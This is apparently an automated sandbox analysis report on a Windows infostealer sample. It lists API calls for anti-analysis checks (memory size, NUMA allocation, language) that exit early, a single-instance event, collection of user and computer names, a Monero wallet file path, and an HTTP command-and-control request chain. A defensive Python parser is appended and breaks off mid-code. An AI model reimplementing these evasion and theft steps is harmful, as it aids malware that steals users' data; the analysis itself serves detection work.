                        • GetProcAddress.KERNEL32(6F070000,01145750), ref: 005FA5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 005FA5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 005FA607
                        • GetProcAddress.KERNEL32(75AF0000,0115D128), ref: 005FA629
                        • GetProcAddress.KERNEL32(75AF0000,01159028), ref: 005FA641
                        • GetProcAddress.KERNEL32(75AF0000,0115D350), ref: 005FA659
                        • GetProcAddress.KERNEL32(75AF0000,0115D2D8), ref: 005FA672
                        • GetProcAddress.KERNEL32(75D90000,011458F0), ref: 005FA693
                        • GetProcAddress.KERNEL32(6E340000,0115D0F8), ref: 005FA6B4
                        • GetProcAddress.KERNEL32(6E340000,01145830), ref: 005FA6CD
                        • GetProcAddress.KERNEL32(6E340000,0115D308), ref: 005FA6E5
                        • GetProcAddress.KERNEL32(6E340000,0115D380), ref: 005FA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 4b9504b6d634eca670a59bb8f77a8ebe7f51b373478110d915de9a9f9b324770
                        • Instruction ID: 143c67517e88da9b3d08bce2ffe60690d999bb1435dac291097a259cb437c0d4
                        • Opcode Fuzzy Hash: 4b9504b6d634eca670a59bb8f77a8ebe7f51b373478110d915de9a9f9b324770
                        • Instruction Fuzzy Hash: F9620BB5500204AFC36CDFA8EE889663BF9FF4C701754C52AE649C3264D7399843DB6A

                        Control-flow Graph (rendered graph omitted from the extraction; legend: Executed / Not Executed)
                        APIs
                          • Part of subcall function 005FA820: lstrlen.KERNEL32(005E4F05,?,?,005E4F05,00600DDE), ref: 005FA82B
                          • Part of subcall function 005FA820: lstrcpy.KERNEL32(00600DDE,00000000), ref: 005FA885
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5857
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5228
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5318
                          • Part of subcall function 005F52C0: lstrlen.KERNEL32(00000000), ref: 005F532F
                          • Part of subcall function 005F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 005F5364
                          • Part of subcall function 005F52C0: lstrlen.KERNEL32(00000000), ref: 005F5383
                          • Part of subcall function 005F52C0: lstrlen.KERNEL32(00000000), ref: 005F53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 005F5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: b862e6108ccaf7ae2bb9803a74f42be1874d6aa757f99fa394513e76fc4e459c
                        • Instruction ID: c24df190534199874ba526d4dfc00be1339227c3f10b707d2a7883afc7721dd3
                        • Opcode Fuzzy Hash: b862e6108ccaf7ae2bb9803a74f42be1874d6aa757f99fa394513e76fc4e459c
                        • Instruction Fuzzy Hash: 1AE143B191010D9BCB18FBB0DD5ADFD7B78BF94340F408528B64A56095EF786A0ACB93

                        Control-flow Graph (rendered graph omitted from the extraction; legend: Executed / Not Executed)
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 005F17C5
                        • ExitProcess.KERNEL32 ref: 005F17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: c325f8ccd1ea5e6299e9f6329aedf748b8895250982b6e5165dd3ae8f9ae5885
                        • Instruction ID: d9f6fa133a04dcbd9b851a821600c535e49ce4ff740f871af6b1d18ffec41d29
                        • Opcode Fuzzy Hash: c325f8ccd1ea5e6299e9f6329aedf748b8895250982b6e5165dd3ae8f9ae5885
                        • Instruction Fuzzy Hash: 6B5176B4A0020EEFDB04DFA0DA94BBE7BB6BF44704F108458E60667380D7B8D951DB66

                        Control-flow Graph

                        Control-flow graph (blocks 5f7500-5f768e): block 5f7500 calls GetWindowsDirectoryA and continues, directly or via 5f754c, to 5f7553-5f75c7, which calls GetVolumeInformationA and 5f8d00 three times. A loop at 5f75d8 repeatedly enters 5f75e1-5f75fa (call 5f8d00) until it exits to 5f75fc-5f7617, which calls GetProcessHeap and RtlAllocateHeap and then branches to either 5f7619-5f7626 (call 5fa740) or 5f7628-5f7658 (wsprintfA, call 5fa740); both rejoin at 5f767e-5f768e.
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 005F7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F760A
                        • wsprintfA.USER32 ref: 005F7640
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$`
                        • API String ID: 1544550907-3750816455
                        • Opcode ID: 13bccd3340454e7e440e935899ab6ab1aa829ab839dbb55129f8d8582652bc45
                        • Instruction ID: 3caf61fcd2ac74768085da14d828a8e6e267601e15d0e205b56d734cbb72a867
                        • Opcode Fuzzy Hash: 13bccd3340454e7e440e935899ab6ab1aa829ab839dbb55129f8d8582652bc45
                        • Instruction Fuzzy Hash: 0C4181B1D0424CABDF10DF94DC45BEEBBB8BF58700F104098F609A7280DB78AA44CBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152398), ref: 005F98A1
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011523B0), ref: 005F98BA
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011523C8), ref: 005F98D2
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011524E8), ref: 005F98EA
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152500), ref: 005F9903
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011590C8), ref: 005F991B
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01145CD0), ref: 005F9933
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01145BB0), ref: 005F994C
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152248), ref: 005F9964
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152260), ref: 005F997C
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152278), ref: 005F9995
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152428), ref: 005F99AD
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01145D90), ref: 005F99C5
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152440), ref: 005F99DE
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005E11D0: ExitProcess.KERNEL32 ref: 005E1211
                          • Part of subcall function 005E1160: GetSystemInfo.KERNEL32(?), ref: 005E116A
                          • Part of subcall function 005E1160: ExitProcess.KERNEL32 ref: 005E117E
                          • Part of subcall function 005E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005E112B
                          • Part of subcall function 005E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005E1132
                          • Part of subcall function 005E1110: ExitProcess.KERNEL32 ref: 005E1143
                          • Part of subcall function 005E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005E123E
                          • Part of subcall function 005E1220: __aulldiv.LIBCMT ref: 005E1258
                          • Part of subcall function 005E1220: __aulldiv.LIBCMT ref: 005E1266
                          • Part of subcall function 005E1220: ExitProcess.KERNEL32 ref: 005E1294
                          • Part of subcall function 005F6770: GetUserDefaultLangID.KERNEL32 ref: 005F6774
                          • Part of subcall function 005E1190: ExitProcess.KERNEL32 ref: 005E11C6
                          • Part of subcall function 005F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005E11B7), ref: 005F7880
                          • Part of subcall function 005F7850: RtlAllocateHeap.NTDLL(00000000), ref: 005F7887
                          • Part of subcall function 005F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005F789F
                          • Part of subcall function 005F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7910
                          • Part of subcall function 005F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005F7917
                          • Part of subcall function 005F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005F792F
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005F6AF9
                        • Sleep.KERNEL32(00001770), ref: 005F6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6B1A
                        • ExitProcess.KERNEL32 ref: 005F6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: f8aeec727ea35323bc2438b55043311d348b2a591ae3f29e0c019392a75a85bc
                        • Instruction ID: b2ac8746abec9c3a0b36b4b412a04d40ee02600b40f68ea85f37072edad41b27
                        • Opcode Fuzzy Hash: f8aeec727ea35323bc2438b55043311d348b2a591ae3f29e0c019392a75a85bc
                        • Instruction Fuzzy Hash: 8631EF7190010EABDB08F7A0DC5AABE7B78BF94380F104528F356A6191DFB85505C6A7

                        Control-flow Graph

                        Control-flow graph (blocks 5e1220-5e129d): block 5e1220 calls 5f89b0 and GlobalMemoryStatusEx, then branches to either 5e1249-5e1271, which calls 5fda00 twice (the two __aulldiv references in the API list fall inside this block), or 5e1273-5e127a. Both reach 5e1281-5e1285, which either proceeds to 5e129a-5e129d (function end) or to 5e1287 and 5e1289-5e1290, whose comparisons lead either to 5e129a-5e129d or to 5e1292-5e1294 (ExitProcess).
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005E123E
                        • __aulldiv.LIBCMT ref: 005E1258
                        • __aulldiv.LIBCMT ref: 005E1266
                        • ExitProcess.KERNEL32 ref: 005E1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: f906acb599eef16b9b914eb555925a22ae31820c99eb63ada60597542948eabf
                        • Instruction ID: 89e1cb7471259b8bee99a0c70813307d8736d7ca0e5e751b36d81fc72423e7b3
                        • Opcode Fuzzy Hash: f906acb599eef16b9b914eb555925a22ae31820c99eb63ada60597542948eabf
                        • Instruction Fuzzy Hash: 16014BB0940348ABEB14DBE2CC49BAEBF78BB54701F208048E745B62C0D6B85645879D

                        Control-flow Graph

                        Control-flow graph (blocks 5f6aba-5f6b22): block 5f6aba-5f6ad7 calls 5faad0 and OpenEventA, then branches either to 5f6ad9-5f6af1 (call 5faad0, CreateEventA), which proceeds to 5f6b0c, or to 5f6af5-5f6b04 (CloseHandle, Sleep), which returns to 5f6b0a. Block 5f6b0a either loops back to 5f6aba or proceeds to 5f6b0c-5f6b22, which calls 5f6920 and 5f5b10 and then CloseHandle and ExitProcess. The graph also lists a block 5f6af3 that leads into 5f6b0a.
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005F6AF9
                        • Sleep.KERNEL32(00001770), ref: 005F6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6B1A
                        • ExitProcess.KERNEL32 ref: 005F6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 9a8322d3521da019dcb2411dd857bb06f81512dbdf4779539cae18b8fd57b5e0
                        • Instruction ID: 1ca50cb4de0ba6e2d6b2a79e958aab2d150a7dfcdc092e24f74d5ab97277c4ef
                        • Opcode Fuzzy Hash: 9a8322d3521da019dcb2411dd857bb06f81512dbdf4779539cae18b8fd57b5e0
                        • Instruction Fuzzy Hash: 1CF03470A4020EAFE720ABA09C0ABBE7E74FF14701F108914B753A21C1DBB85541DAA6

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 025ee46ed91c21370a1cdb1d2ca12b9e5dfa9989dce48e09f360e437982e1668
                        • Instruction ID: 723a96a422f63bd63571047264b2fd9b4411449ac7e7c42f0b05d9c7db1e9a3e
                        • Opcode Fuzzy Hash: 025ee46ed91c21370a1cdb1d2ca12b9e5dfa9989dce48e09f360e437982e1668
                        • Instruction Fuzzy Hash: 412142B1D00209ABDF14DFA4E849ADD7B74FF44310F108625F559A72C1DB706605CF92

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E6280: InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
                          • Part of subcall function 005E6280: StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6303
                          • Part of subcall function 005E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
                          • Part of subcall function 005E6280: HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
                          • Part of subcall function 005E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
                          • Part of subcall function 005E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 9f70e631c66d8f1639f6baf99024e9b8c244140345d8bef5c9ff9a9b082b7238
                        • Instruction ID: ea4a61f22ca0bd2861b335c8df4dbe5328fb301449c88483c71223ae66e30972
                        • Opcode Fuzzy Hash: 9f70e631c66d8f1639f6baf99024e9b8c244140345d8bef5c9ff9a9b082b7238
                        • Instruction Fuzzy Hash: 91110D7090014DA7CB18FB60DD5AAFD7B38BF90340F408554FA4A5B192EF786B0ACA92
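                        Added example, not part of the Joe Sandbox report and not code from the sample: a small Python parser for the "APIs" lines in these function entries. It decodes the constant arguments the report prints as raw hex (EVENT_ALL_ACCESS, the Sleep interval, the WinINet open type, service, option and request flags, the allocation type and page protection) and tags each function with the pattern its call order shows: the GlobalMemoryStatusEx and VirtualAllocExNuma checks that end in ExitProcess, the OpenEventA/CreateEventA single-instance check, and the InternetOpenA to HttpSendRequestA chain whose result is compared with "ERROR". The sample input is copied from the entries above; the entry labels, the rule table and the reading that the five values listed against GetCurrentProcess are the arguments already pushed for the following VirtualAllocExNuma call (which takes the returned handle as its first argument) are this example's own assumptions. The constant names are Windows SDK values.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied from this report's per-function "APIs"
# sections. The labels are this example's own; the report identifies the
# functions only by block addresses and "Part of subcall function" prefixes.
SAMPLE_ENTRIES = {
    "ram check (5e1220)": """
• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005E123E
• __aulldiv.LIBCMT ref: 005E1258
• __aulldiv.LIBCMT ref: 005E1266
• ExitProcess.KERNEL32 ref: 005E1294
""",
    "numa alloc (subcall 005E1110)": """
  • Part of subcall function 005E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005E112B
  • Part of subcall function 005E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005E1132
  • Part of subcall function 005E1110: ExitProcess.KERNEL32 ref: 005E1143
""",
    "event check (5f6aba)": """
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6ACA
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F6AE8
• CloseHandle.KERNEL32(00000000), ref: 005F6AF9
• Sleep.KERNEL32(00001770), ref: 005F6B04
• ExitProcess.KERNEL32 ref: 005F6B22
""",
    "c2 request (subcall 005E6280)": """
  • Part of subcall function 005E6280: InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
  • Part of subcall function 005E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
  • Part of subcall function 005E6280: HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
  • Part of subcall function 005E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
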